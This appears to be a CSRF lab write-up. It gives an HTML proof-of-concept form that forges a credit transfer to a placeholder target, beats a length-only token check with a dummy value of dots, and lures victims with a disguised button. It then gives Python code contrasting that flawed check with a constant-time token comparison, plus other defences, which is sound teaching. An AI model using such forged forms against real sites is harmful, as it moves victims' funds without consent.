Creating a CSRF PoC:
CSRF (cross-site request forgery) is an attack in which an attacker tricks a victim into performing an unwanted action on a website where the victim is already authenticated, usually without the victim's knowledge or consent: the browser attaches the victim's session cookies to the forged request automatically.
In this exercise, we'll demonstrate a simple CSRF attack by crafting a form that transfers credits from a logged-in user's account to another user without their knowledge. Hint for finding the exploit: add a `csrf_token` field to the HTML PoC whose value has the same length as a real token.
```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CSRF PoC</title>
</head>
<body>
  <h2>CSRF Attack Example</h2>
  <p>This page is crafted by an attacker to demonstrate a CSRF vulnerability. In a real-world scenario, a victim would be lured to this page while logged into the target website.</p>
  <!-- TARGET_URL is a placeholder for the URL of the original PHP page -->
  <form action="TARGET_URL" method="post">
    <input type="hidden" name="receiver" value="user1">
    <input type="hidden" name="amount" value="100">
    <!-- the token field must be a hidden input named csrf_token; the dots stand in for a value of the same length as a real token -->
    <input type="hidden" name="csrf_token" value="........">
    <input type="submit" value="Click me for a surprise!">
  </form>
</body>
</html>
```
- Create an HTML page with the necessary form.
- Replace `TARGET_URL` with the URL where the original PHP page is hosted.
- When a logged-in user visits this crafted page and clicks the button, the browser sends the POST with the user's session cookies and the credits are transferred without their direct consent.
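The reason the "same length" hint works is that a token check which only compares lengths accepts any value of the right size, so the forged form above passes it. The following is an added example, not code from the original exercise or its PHP target, showing a length-only validator beside a correct one that compares a server-stored per-session token in constant time. The session and form dictionaries, the `handle_transfer` function and the `csrf_token` field name are assumptions for illustration.

```python
import hmac
import secrets

TOKEN_BYTES = 32  # 256 bits of randomness per token


def issue_token(session: dict) -> str:
    """Mint a fresh per-session CSRF token and store it server-side.

    The server embeds the returned value in its own forms as a hidden
    csrf_token field; an attacker's page has no way to read it.
    """
    token = secrets.token_urlsafe(TOKEN_BYTES)
    session["csrf_token"] = token
    return token


def weak_validate(session: dict, form: dict) -> bool:
    """Length-only check: the flaw the exercise hint refers to.

    Any submitted value of the right length passes, so a row of dots
    of the same length as a real token is accepted.
    """
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if expected is None or submitted is None:
        return False
    return len(submitted) == len(expected)


def strict_validate(session: dict, form: dict) -> bool:
    """Correct check: the submitted value must equal the stored token.

    hmac.compare_digest runs in constant time, so an attacker cannot
    learn the token byte by byte from response timing.
    """
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def handle_transfer(session: dict, form: dict, validator) -> dict:
    """Hypothetical transfer endpoint: reject the request unless the
    chosen validator accepts the CSRF token, otherwise perform it."""
    if not validator(session, form):
        return {"status": 403, "error": "invalid CSRF token"}
    return {
        "status": 200,
        "receiver": form["receiver"],
        "amount": int(form["amount"]),
    }


def forged_form(session: dict) -> dict:
    """Constructed sample input: the fields the crafted HTML page posts,
    with a csrf_token of dots matching the real token's length."""
    return {
        "receiver": "user1",
        "amount": "100",
        "csrf_token": "." * len(session["csrf_token"]),
    }


def legitimate_form(session: dict) -> dict:
    """Constructed sample input: a form rendered by the site itself,
    carrying the real token from the user's session."""
    return {
        "receiver": "user1",
        "amount": "100",
        "csrf_token": session["csrf_token"],
    }


if __name__ == "__main__":
    session = {}
    issue_token(session)
    print("weak  / forged    :", handle_transfer(session, forged_form(session), weak_validate))
    print("strict/ forged    :", handle_transfer(session, forged_form(session), strict_validate))
    print("strict/ legitimate:", handle_transfer(session, legitimate_form(session), strict_validate))
```

Under `weak_validate` the forged form is accepted and the transfer goes through; under `strict_validate` it is rejected with a 403 while the site's own form still succeeds. The token check is the primary defence; setting the session cookie with `SameSite=Lax` or `Strict` and verifying the `Origin` header on state-changing requests add independent layers.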